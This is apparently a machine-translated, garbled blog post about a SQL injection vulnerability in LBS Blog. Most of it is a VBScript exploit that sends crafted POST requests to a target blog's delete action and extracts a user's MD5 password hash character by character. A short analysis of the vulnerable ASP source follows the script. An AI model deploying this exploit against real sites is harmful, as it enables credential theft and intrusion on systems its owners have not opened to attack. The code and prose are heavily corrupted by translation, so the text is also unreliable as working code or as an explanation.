LBSブログsql注射ホール[All version]-公式パッチがあります。

へへ，ただ証明の下で穴がexp存在します。vbsとして保存します。自分で次のプログラムをテストします。 剣心'=================================================================================================================================== コマンドプロンプトの下で:' cscript.exe lbs blog.vbs 攻撃するサイトのブログパス 有効な文章ID 解読するブログのユーザパスワード cscript.exe lbs blog.vbs wwww.xxxxxx.com/blog/ 1 1 by love shell======================================================================================================On エロエロ Resume Next Dim oArgs Dim olbsXML 'XMLHTTPオブジェクトはターゲットURL Dimを開くために使用されます。 Target URL 'ターゲットURL Dim userid，artic leid 'ブログ名Dim TempStr '取得した部分を保存します。 MD 5パスワードDim CharHex '16進数文字Dimを定義します。 charset Set オーアーク = WScript.argments If oArgs.com unt < 1 The n コール ShowUsage Set olbsXML = createObject(「Microsoft.XMLHTTP」)'は完全な目標URL Target URLを補足します。 = oArgs(0)If LCase(Left(Target URL，7) <> "http:// The n Target URL = "http:// & Target URL If right（Target URL，1） <> "/" The n Target URL = Target URL & "/" Target URL=Target URL & "articale.asp「artic leid=oArgs(1)userid=oArgs(2)TempStr=」「CharHex=Split("0,1,2,3,4,5,6,7,8,9,a，b，c，d，e，f"，"，"WScript.echo." "LBS ブログ All version Exploid"&vbcrlf WScript.echo "By 剣心&vbcrlf WScript.echo "http://www.loveshell.net/    Just For ふうふ :)"&vbcrlf&vbcrlf WScript.echo "+FUCK the シンプル now"&vbcrlf Call main（Target URL、BlogName）  セット o BokeXML = Nothing'-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------======================='関数名：メーン関数機能：メインプログラムは、ブログに注入して、 ユーザパスワード'======================================================Sub main(Target URL，BlogName)Dim MainOffset，SubOffset，TempLen，Open URL，GetPage For MainOffset = 1 To 40 For SubOffset = 0 To 15 TempLen = 0    postdata = ""     postdata = アートリスト &" and (プロジェクト left(user_)password，“&MainOffset&”） from ブログuser where アメリカ.id=" & アメリカ & ")='" & TempStr&CharHex(SubOffset) &"'"     Open URL = Target URL olbsXML.open "Post「Open URL、 False "", ""     olbsXML.set Request Header "Connect-Type"，"appication/x-wn-form-urlencoded"olbsXML.send "act=delete&id="& escape(postdata)GetPage = Bytes ToBstr（olbsXML.ResponseBody）'は、訪問ページにIfがあるかどうかを判断します。 InStr（GetPage，「deleted」）<>0 The n  '"ブログユーザーが存在しないか、または記入している資料に誤りがあります。 エラーフラグ ，このフラグの説明を返します。 心当て MD 5 正しくないです。 000000万円 の MD 5 値は、エラーフラグElseIfを変更してください。 InStr（GetPage，「permission」）<>0 The n TempStr=TempStr & CharHex(SubOffset)WScript.Echo "+クラック now:'&TempStr Exit for Else WScript.echo vbcrlf & "Something error" & vbcrlf  WScript.echo vbcrlf & GetPage& vbcrlf  WScript.Quit End If。  next Next WScript.Echo vbcrlf& "+はい。 Got It:" & TempStr & vbcrlf &vbcrlf&"：P Don't Be エヴィル「End」 sub'===================================================================関数名:Bytes ToBstr'関数:XMLHTTPオブジェクトの内容をGB 2312符号化'=============================================================================== Bytes ToBstr(body)dim objstream set objstream = createObject(「ADODB.Stream」)objstream.Type = 1 objstream.Mode =3 objstream.Open objstream.Write body objstream.Position = 0 objstream.Type = 2 objstream.Chiset = "GB 2312「Bytes ToBstr」 = objstream.ReadText objstream.Close set objstream = nothing End Function'=============================関数名:ShowUsage'関数機能:使い方ヒント'======================================Sub ShowUsage()WScript.echo " LBS ブログ Exploid" & vbcrlf & " By Loveshell/剣心「WScript.echo」 "Usage:"& vbcrlf & " CScript " & WScript.Script FulName &" Target URL BlogName「WScript.echo」 "Example:"& vbcrlf & " CScript " & WScript.Script FulName &" http://www.loveshell.net/ 1 1「WScript.echo "" WScript.Quit End Subホール説明：src_articale.aspの中の…input[log_]id'=func.checkInt(input[]log_id');if(input[id]{sterror=lang[[invalid_]parameter";else{// Check if the アーティスト exists theArtcle.loadid ロゴauthorID、 ロゴcatID"，"log_"id=「+input["id"」);strerror=false;…….フィルターはロゴですIDは確かに使ってます。 :) それからclass/articale.aspのコードthis.load = function(strect) strwhere){var} tmpA=connBlog.query（「select」） トップ 1 "+strect+" FROM [ブログArtcle. where "+strewhere;if(tmpA){this.fill(tmpA[0])return true;else{return} false；｝上は言うまでもないでしょう。へへへ。でも条件を触発して、見て満足できません。機能 articledelete(){if(theUser.rights["delete]<<1){/ Check User Right - without DB Query pageHeader（lang[error]）；redirectMessage(lang[error])は、 lang[no_]ライツ""、 lang[goback]、 "javascript：window.history.back（）：" false "errorbox");else{var thearticle=new lbsArtcle（）;var strerr;デフォルトでは、gustは削除する権限があります。その後も判断しましたが、注入はすでに発生しました。私達はちょうど彼の判断注射を利用しています。